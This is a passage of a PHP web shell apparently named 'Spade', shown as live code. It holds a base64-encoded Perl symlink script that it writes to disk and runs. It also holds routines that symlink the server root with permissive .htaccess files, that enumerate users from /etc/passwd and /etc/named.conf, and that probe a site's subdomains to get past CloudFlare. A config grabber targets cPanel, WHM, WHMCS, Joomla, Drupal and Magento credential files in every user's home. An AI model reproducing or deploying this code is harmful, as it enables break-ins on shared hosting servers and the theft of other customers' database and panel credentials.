WxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkX1sxXS4nfn5QaHBiYjIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRfWzFdLid+fmlwYjEudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywkX1sxXS4nfn5Xb3JkcHJlc3MxLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywkX1sxXS4nfn5Xb3JkcHJlc3MyLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fkpvb21sYTEudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9ibG9nL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5Kb29tbGEyLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5Kb29tbGEzLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmItY29uZmlnLnBocCcsJF9bMV0uJ35+Ym94YmlsbGluZy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2JpbGxpbmcvYmItY29uZmlnLnBocCcsJF9bMV0uJ35+Ym94YmlsbGluZy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJF9bMV0uJ35+V2htMS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobWMvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTIudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG0zLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG00LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTUudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG02LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJF9bMV0uJ35+V2htNy50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkX1sxXS4nfn5XaG04LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvb3JkZXIvY29uZmlndXJhdGlvbi5waHAnLCRfWzFdLid+fldobTkudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJF9bMV0uJ35+NS50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRfWzFdLid+fjQudHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRfWzFdLid+fmludmlzaW8udHh0Jyk7CgkJCXN5bWxpbmsoJy9ob21lLycuJF9bMF0uJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJF9bMV0uJ35+Ny50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywkX1sxXS4nfn44LnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRfWzFdLid+fm1rLXBvcnRhbGUxLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywkX1sxXS4nfn4xMi50eHQnKTsKCQkJc3ltbGluaygnL2hvbWUvJy4kX1swXS4nL3B1YmxpY19odG1sL3NldHRpbmdzLnBocCcsJF9bMV0uJ35+U21mLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZXMvZnVuY3Rpb25zLnBocCcsJF9bMV0uJ35+cGhwYmIzLnR4dCcpOwoJCQlzeW1saW5rKCcvaG9tZS8nLiRfWzBdLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRfWzFdLid+fmluZmluaXR5LnR4dCcpOwp9CnN1YiBjaGRyCnsKCWNoZGlyICRfWzBdOwoJb3BlbihEQVRBLCAiPi5odGFjY2VzcyIpOwoJcHJpbnQgREFUQSAiT3B0aW9ucyBhbGxcbkRpcmVjdG9yeUluZGV4IHNwLmh0bWxcbkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwXG5BZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQgLnBocFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sXG5BZGRIYW5kbGVyIHR4dCAuaHRtbFxuUmVxdWlyZSBOb25lXG5TYXRpc2Z5IEFueSI7Cn0KaWYoJHNlcnZlciBlcSAiU2VydmVyIFN5bSIpCnsKCW1rZGlyICJTcGFkZV9wZXJsc3ltIiwgMDc1NTsKCSZjaGRyKCJTcGFkZV9wZXJsc3ltIik7CgljaGRpciAiU3BhZGVfcGVybHN5bSI7CglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJQGtyID0gPGQwbWFpbnM+OwoJY2xvc2UgZDBtYWluczsKCWlmICgkZXJyKQoJewoJCW9wZW4gSU5QVVQsICI8L2V0Yy9wYXNzd2QiOwoJCXdoaWxlICggPElOUFVUPiApCgkJewoJCQkkbGluZT0kXzsgQHNwcnQ9c3BsaXQoLzovLCRsaW5lKTsgJHVzZXI9JHNwcnRbMF07CgkJCXN5c3RlbSgnbG4gLXMgL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sICcgLiAkdXNlcik7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlNlcnZlciBTeW08L2E+PC9jZW50ZXI+JzsKCX0KCWVsc2UKCXsKCQlmb3JlYWNoIG15ICRvbmUgKEBrcikKCQl7CgkJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pCgkJCXsKCQkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kMTsKCQkJCSRvd25lciA9IGdldHB3dWlkKChzdGF0KCRmaWxlbmFtZSkpWzRdKTsKCQkJCXN5c3RlbSgnbG4gLXMgL2hvbWUvJy4kb3duZXIuJy9wdWJsaWNfaHRtbCAnIC4gJDEpOwoJCQl9CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlNlcnZlciBTeW08L2E+PC9jZW50ZXI+JzsKCX0KfQplbHNpZigkcGVybCBlcSAiUGVybCBTeW0iKQp7Cglta2RpciAiU3BhZGVfcGVybHN5bSIsIDA3NTU7CgkmY2hkcigiU3BhZGVfcGVybHN5bSIpOwoJY2hkaXIgIlNwYWRlX3BlcmxzeW0iOwoJb3BlbiAoZDBtYWlucywgJy9ldGMvbmFtZWQuY29uZicpIG9yICRlcnI9MTsKCUBrciA9IDxkMG1haW5zPjsKCWNsb3NlIGQwbWFpbnM7CglpZiAoJGVycikKCXsKCQlvcGVuIElOUFVULCAiPC9ldGMvcGFzc3dkIjsKCQl3aGlsZSAoIDxJTlBVVD4gKQoJCXsKCQkJJGxpbmU9JF87IEBzcHJ0PXNwbGl0KC86LywkbGluZSk7ICR1c2VyPSRzcHJ0WzBdOwoJCQlzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwnLCAkdXNlcik7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlBlcmwgU3ltPC9hPjwvY2VudGVyPic7Cgl9CgllbHNlCgl7CgkJZm9yZWFjaCBteSAkb25lIChAa3IpCgkJewoJCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCQl7CgkJCQkkZmlsZW5hbWU9ICIvZXRjL3ZhbGlhc2VzLyIuJDE7CgkJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCQlzeW1saW5rKCcvaG9tZS8nLiRvd25lci4nL3B1YmxpY19odG1sJywgJDEpOwoJCQl9CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltPlBlcmwgU3ltPC9hPjwvY2VudGVyPic7Cgl9Cn0KZWxzaWYoJGNvbmZpZyBlcSAiR2V0IGNvbmZpZyIpCnsKCW1rZGlyICJTcGFkZV9wZXJsc3ltMiIsIDA3NTU7CgkmY2hkcigiU3BhZGVfcGVybHN5bTIiKTsKCWNoZGlyICJTcGFkZV9wZXJsc3ltMiI7CglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJQGtyID0gPGQwbWFpbnM+OwoJY2xvc2UgZDBtYWluczsKCWlmICgkZXJyKQoJewoJCW9wZW4gSU5QVVQsICI8L2V0Yy9wYXNzd2QiOwoJCXdoaWxlICggPElOUFVUPiApCgkJewoJCQkkbGluZT0kXzsgQHNwcnQ9c3BsaXQoLzovLCRsaW5lKTsgJHVzZXI9JHNwcnRbMF07CgkJCSR1c2VyMSA9ICR1c2VyOwoJCQkmZ2V0c3ltKCR1c2VyLCR1c2VyMSk7CgkJfQoJCXByaW50ICc8Y2VudGVyPi8vPj4gPGEgaHJlZj1TcGFkZV9wZXJsc3ltMj5Db25maWcgU3ltPC9hPjwvY2VudGVyPic7Cgl9CgllbHNlCgl7CgkJZm9yZWFjaCBteSAkb25lIChAa3IpCgkJewoJCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCQl7CgkJCQkkZmlsZW5hbWU9ICIvZXRjL3ZhbGlhc2VzLyIuJDE7CgkJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCQkmZ2V0c3ltKCRvd25lciwkMSk7CgkJCX0KCQl9CgkJcHJpbnQgJzxjZW50ZXI+Ly8+PiA8YSBocmVmPVNwYWRlX3BlcmxzeW0yPkNvbmZpZyBTeW08L2E+PC9jZW50ZXI+JzsKCX0KfQplbHNpZigkZXhlY21kIGVxICJFeGVjdXRlIikKewoJcHJpbnQgJzxicj48YnI+PGNlbnRlcj48cHJlPicucmVhZHBpcGUoJGV4ZWN1dGUpLic8L3ByZT48L2NlbnRlcj4nOwp9CnByaW50ICc8L2JvZHk+PC9odG1sPic7";
  3250. $lelwasym = base64_decode($peperl);
  3251. $fp1212 = fopen('spade.pl','w');
  3252. $fw11111 = fwrite($fp1212,$lelwasym);
  3253. @fclose($fw11111);
  3254. chmod("spade.pl",0755); echo '<br><center><iframe src="spade.pl" height="400" class="button" width="98%"></iframe></center>';
  3255. }
  3256. if(isset($_POST['sym1'])){
  3257. error_reporting(0);
  3258. ob_start();
  3259. $dir = "Spade_sym1";
  3260. @mkdir($dir);
  3261. $dir2 = "Spade_sym2";
  3262. @mkdir($dir2);
  3263. $dir3 = "Spade_sym3";
  3264. @mkdir($dir3);
  3265. $dir4 = "Spade_sym4";
  3266. @mkdir($dir4);
  3267. $dir5 = "Spade_sym5";
  3268. @mkdir($dir5);
  3269. $dir6 = "Spade_sym6";
  3270. @mkdir($dir6);
  3271. $dir7 = "Spade_sym7";
  3272. @mkdir($dir7);
  3273. //Spade_Sym1
  3274. $sec1 = "Spade_sym1/.htaccess";
  3275. $hsec1 = fopen($sec1, 'w') or die("Error: Can't open file");
  3276. $con1 = "Options Indexes FollowSymLinks\n DirectoryIndex spade1.htm\n AddType txt .php\n AddHandler txt .php\n AddType txt .html\n AddHandler txt .html\n Options all\n Options\n Allow from all\n Require None\n Satisfy Any";
  3277. fwrite($hsec1, $con1);
  3278. fclose($hsec1);
  3279. //Spade_sym2
  3280. $sec2 = "Spade_sym2/.htaccess";
  3281. $hsec2 = fopen($sec2, 'w') or die("Error: Can't open file");
  3282. $con2 = "Options +FollowSymLinks\n DirectoryIndex spade2.html\n RemoveHandler .php\n AddType application/octet-stream .php ";
  3283. fwrite($hsec2, $con2);
  3284. fclose($hsec2);
  3285. //Spade_sym3
  3286. $sec3 = "Spade_sym3/.htaccess";
  3287. $hsec3 = fopen($sec3, 'w') or die("Error: Can't open file");
  3288. $con3 = "Options +FollowSymLinks\n DirectoryIndex spade3.html\n Options +Indexes\n AddType text/plain .php\n AddHandler server-parsed .php";
  3289. fwrite($hsec3, $con3);
  3290. fclose($hsec3);
  3291. //Spade_sym4
  3292. $sec4 = "Spade_sym4/.htaccess";
  3293. $hsec4 = fopen($sec4, 'w') or die("Error: Can't open file");
  3294. $con4 = "Options Indexes FollowSymLinks\n DirectoryIndex spade4.htm\n AddType txt .php\n AddHandler txt .php";
  3295. fwrite($hsec4, $con4);
  3296. fclose($hsec4);
  3297. //Spade_sym5
  3298. $sec5 = "Spade_sym5/.htaccess";
  3299. $hsec5 = fopen($sec5, 'w') or die("Error: Can't open file");
  3300. $con5 = "Options all\n DirectoryIndex spade5.html\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html";
  3301. fwrite($hsec5, $con5);
  3302. fclose($hsec5);
  3303. //Spade_sym6
  3304. $sec6 = "Spade_sym6/.htaccess";
  3305. $hsec6 = fopen($sec6, 'w') or die("Error: Can't open file");
  3306. $con6 = "Options +FollowSymLinks\n DirectoryIndex spade6.html\n Options +Indexes\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html";
  3307. fwrite($hsec6, $con6);
  3308. fclose($hsec6);
  3309. //Spade_sym7
  3310. $sec7 = "Spade_sym7/.htaccess";
  3311. $hsec7 = fopen($sec7, 'w') or die("Error: Can't open file");
  3312. $con7 = "Options Indexes FollowSymLinks\n AddType text/plain .php .inc .asp .php3\n Options All\n Options All";
  3313. fwrite($hsec7, $con7);
  3314. fclose($hsec7);
  3315. for($k=1;$k<8;$k++){
  3316. if("$fp$k"){
  3317. chdir('Spade_sym'.$k);
  3318. exe('ln -s / spade.txt');
  3319. chdir('../');
  3320. }else{
  3321. echo "<font color=red>Symlink V1 Error!</font>";
  3322. }
  3323. }//for
  3324. echo "<table><tr><th>User</th><th>Symlink</th></tr>";
  3325. $etc = file("/etc/passwd");
  3326. if(!$etc){ die("<font color=red>Symlink V1 Error!</font>");
  3327. }else{
  3328. foreach($etc as $passwd){
  3329. $ogmeme = explode(':', $passwd);
  3330. $meme = $ogmeme['0'];
  3331. echo "<tr><td>".$meme."</td><td><a href='Spade_sym1/spade.txt/home/".$meme."/public_html/'>Sym1</a> :~: <a href='Spade_sym2/spade.txt/home/".$meme."/public_html/'>Sym2</a> :~: <a href='Spade_sym3/spade.txt/home/".$meme."/public_html/'>Sym3</a> :~: <a href='Spade_sym4/spade.txt/home/".$meme."/public_html/'>Sym4</a> :~: <a href='Spade_sym5/spade.txt/home/".$meme."/public_html/'>Sym5</a> :~: <a href='Spade_sym6/spade.txt/home/".$meme."/public_html/'>Sym6</a> :~: <a href='Spade_sym7/spade.txt/home/".$meme."/public_html/'>Sym7</a></td></tr>";
  3332. }//foreach
  3333. }///etc/passwd
  3334. echo "</table>";
  3335. }
  3336. if(isset($_POST['sym2'])){
  3337. echo "<table><tr><th>Domains</th><th>User</th><th>Symlink</th></tr>";
  3338. if(!is_file("DATA.txt")){
  3339. $named = @file("/etc/named.conf");
  3340. }else{
  3341. $named = @file("DATA.txt");
  3342. }
  3343. if(!$named){ die("<font color=red>Symlink V2 Error!</font>");
  3344. }else{
  3345. foreach($named as $domains){
  3346. preg_match_all('#zone "(.*)"#', $domains, $d0mains);
  3347. if(strlen(trim($d0mains[1][0])) > 2){
  3348. $meme = posix_getpwuid(@fileowner("/etc/valiases/".$d0mains[1][0]));
  3349. echo "<tr><td><a href='http://www.".$d0mains[1][0]."/' target='_blank'>".$d0mains[1][0]."</a></td><td>".$meme['name']."</td><td><a href='Spade_sym1/spade.txt/home/".$meme['name']."/public_html/'>Sym1</a> :~: <a href='Spade_sym2/spade.txt/home/".$meme['name']."/public_html/'>Sym2</a> :~: <a href='Spade_sym3/spade.txt/home/".$meme['name']."/public_html/'>Sym3</a> :~: <a href='Spade_sym4/spade.txt/home/".$meme['name']."/public_html/'>Sym4</a> :~: <a href='Spade_sym5/spade.txt/home/".$meme['name']."/public_html/'>Sym5</a> :~: <a href='Spade_sym6/spade.txt/home/".$meme['name']."/public_html/'>Sym6</a> :~: <a href='Spade_sym7/spade.txt/home/".$meme['name']."/public_html/'>Sym7</a></td></tr>";
  3350. }//ifstatement
  3351. }//foreach
  3352. }
  3353. echo "</table>";
  3354. }
  3355. echo "</center>";
  3356. }elseif($_GET['do'] == 'symlink') {
  3357. echo "<center><h1 class='titulo'>SERVER SYMLINKER</h1><br>";
  3358. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3359. $d0mains = @file("/etc/named.conf");
  3360. ##httaces
  3361. if($d0mains){
  3362. @mkdir("spade_sym",0777);
  3363. @chdir("spade_sym");
  3364. @exe("ln -s / root");
  3365. $file3 = 'Options Indexes FollowSymLinks
  3366. DirectoryIndex spade.htm
  3367. AddType text/plain .php
  3368. AddHandler text/plain .php
  3369. Satisfy Any';
  3370. $fp3 = fopen('.htaccess','w');
  3371. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3372. echo "
  3373. <table align=center border=1 style='width:60%;border-color:#333333;'>
  3374. <tr>
  3375. <td align=center><font size=2>S. No.</font></td>
  3376. <td align=center><font size=2>Domains</font></td>
  3377. <td align=center><font size=2>Users</font></td>
  3378. <td align=center><font size=2>Symlink</font></td>
  3379. </tr>";
  3380. $dcount = 1;
  3381. foreach($d0mains as $d0main){
  3382. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3383. flush();
  3384. if(strlen(trim($domains[1][0])) > 2){
  3385. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3386. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3387. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3388. <td>".$user['name']."</td>
  3389. <td><a href='$full/spade_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3390. flush();
  3391. $dcount++;}}}
  3392. echo "</table>";
  3393. }else{
  3394. $TEST=@file('/etc/passwd');
  3395. if ($TEST){
  3396. @mkdir("spade_sym",0777);
  3397. @chdir("spade_sym");
  3398. exe("ln -s / root");
  3399. $file3 = 'Options Indexes FollowSymLinks
  3400. DirectoryIndex spade.htm
  3401. AddType text/plain .php
  3402. AddHandler text/plain .php
  3403. Satisfy Any';
  3404. $fp3 = fopen('.htaccess','w');
  3405. $fw3 = fwrite($fp3,$file3);
  3406. @fclose($fp3);
  3407. echo "
  3408. <table align=center border=1><tr>
  3409. <td align=center><font size=3>S. No.</font></td>
  3410. <td align=center><font size=3>Users</font></td>
  3411. <td align=center><font size=3>Symlink</font></td></tr>";
  3412. $dcount = 1;
  3413. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3414. while(!feof($file)){
  3415. $s = fgets($file);
  3416. $matches = array();
  3417. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3418. $matches = str_replace("home/","",$matches[1]);
  3419. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3420. continue;
  3421. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3422. <td align=center><font class=txt>" . $matches . "</td>";
  3423. echo "<td align=center><font class=txt><a href=$full/spade_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3424. $dcount++;}fclose($file);
  3425. echo "</table>";}else{if($os != "Windows"){@mkdir("spade_sym",0777);@chdir("spade_sym");@exe("ln -s / root");$file3 = 'Options Indexes FollowSymLinks
  3426. DirectoryIndex spade.htm
  3427. AddType text/plain .php
  3428. AddHandler text/plain .php
  3429. Satisfy Any
  3430. ';
  3431. $fp3 = fopen('.htaccess','w');
  3432. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3433. echo "
  3434. <div class='mybox'>
  3435. <table align=center border=1><tr>
  3436. <td align=center><font size=3>ID</font></td>
  3437. <td align=center><font size=3>Users</font></td>
  3438. <td align=center><font size=3>Symlink</font></td></tr>";
  3439. $temp = "";$val1 = 0;$val2 = 1000;
  3440. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3441. if ($uid)$temp .= join(':',$uid)."\n";}
  3442. echo '<br/>';$temp = trim($temp);$file5 =
  3443. fopen("test.txt","w");
  3444. fputs($file5,$temp);
  3445. fclose($file5);$dcount = 1;$file =
  3446. fopen("test.txt", "r") or exit("Unable to open file!");
  3447. while(!feof($file)){$s = fgets($file);$matches = array();
  3448. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3449. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3450. continue;
  3451. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3452. <td align=center><font class=txt>" . $matches . "</td>";
  3453. echo "<td align=center><font class=txt><a href=$full/spade_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3454. $dcount++;}
  3455. fclose($file);
  3456. echo "</table></div></center>";unlink("test.txt");
  3457. } else
  3458. echo "<center><font size=3>Cannot create Symlink</font></center>";
  3459. }
  3460. } echo "</center>";
  3461. }elseif($_GET['do'] == 'cloudflare'){
  3462. echo "<center><h1 class=titulo>CloudFlare Bypass</h1><br><form method=post>Target Url:: <input type=text name='cloudflare' placeholder='target.com'><input type=submit value='Bypass'></form><br>";
  3463. if(isset($_POST['cloudflare'])){
  3464. function is_ipv4($ip){ return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)'; }
  3465. $url = $_POST['cloudflare'];
  3466. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  3467. $url = preg_replace('/^(https?):\/\//', '', $url);
  3468. $url = "http://www.".$url;
  3469. }
  3470. $headers = @get_headers($url, 1);
  3471. $server = $headers['Server'];
  3472. $subs = array('news.','download.','','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
  3473. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
  3474. if($matches[2] != 'www'){
  3475. $url = preg_replace('/^(https?):\/\//', '', $url);
  3476. }else{
  3477. $url = explode($matches[0], $url);
  3478. $url = $url[1];
  3479. }
  3480. }
  3481. if(is_array($server))$server = $server[0];
  3482. if(preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n<br>";
  3483. else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  3484. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  3485. echo "[+] Searching for more IP addresses.\n\n<br><br>";
  3486. for($x=0;$x<count($subs);$x++){
  3487. $site = $subs[$x] . $url;
  3488. $ip = is_ipv4(gethostbyname($site));
  3489. if($ip == '(Null)') continue;
  3490. echo "Trying {$site}: {$ip}\n<br>";
  3491. }
  3492. echo "\n[+] Finished.\n<br>";
  3493. }
  3494. echo "</center>";
  3495. }elseif($_GET['do'] == 'config') {
  3496. echo "<center><h1 class='titulo'>SYM/CONFIG</h1></center><br>";
  3497. if($_POST){
  3498. $passwd = $_POST['passwd'];
  3499. mkdir("spade_config", 0777);
  3500. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3501. $htc = fopen("spade_config/.htaccess","w");
  3502. fwrite($htc, $isi_htc);
  3503. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3504. foreach($user_config[1] as $user_spade) {
  3505. $user_config_dir = "/home/$user_spade/public_html/";
  3506. if(is_readable($user_config_dir)) {
  3507. $grab_config = array(
  3508. "/home/$user_spade/.my.cnf" => "cpanel",
  3509. "/home/$user_spade/.accesshash" => "WHM-accesshash",
  3510. "/home/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
  3511. "/home/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
  3512. "/home/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3513. "/home/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
  3514. "/home/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
  3515. "/home/$user_spade/public_html/forum/config.php" => "phpBB",
  3516. "/home/$user_spade/public_html/sites/default/settings.php" => "Drupal",
  3517. "/home/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
  3518. "/home/$user_spade/public_html/app/etc/local.xml" => "Magento",
  3519. "/home/$user_spade/public_html/admin/config.php" => "OpenCart",
  3520. "/home/$user_spade/public_html/slconfig.php" => "Sitelok",
  3521. "/home/$user_spade/public_html/application/config/database.php" => "Ellislab",
  3522. "/home/$user_spade/public_html/whm/configuration.php" => "WHMCS",
  3523. "/home/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
  3524. "/home/$user_spade/public_html/central/configuration.php" => "WHM Central",
  3525. "/home/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  3526. "/home/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
  3527. "/home/$user_spade/public_html/submitticket.php" => "WHMCS",
  3528. "/home/$user_spade/public_html/configuration.php" => "Joomla",
  3529. "/home/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  3530. "/home/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
  3531. "/home/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  3532. "/home/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
  3533. "/home/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
  3534. "/home/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
  3535. "/home/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
  3536. "/home/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
  3537. "/home/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
  3538. "/home/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
  3539. "/home/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
  3540. "/home/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
  3541. "/home/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
  3542. "/home/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
  3543. "/home/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
  3544. "/home/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
  3545. "/home/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
  3546. "/home/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
  3547. "/home/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
  3548. "/home/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
  3549. "/home/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
  3550. "/home/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  3551. "/home/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  3552. "/home/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
  3553. "/home/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
  3554. "/home/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
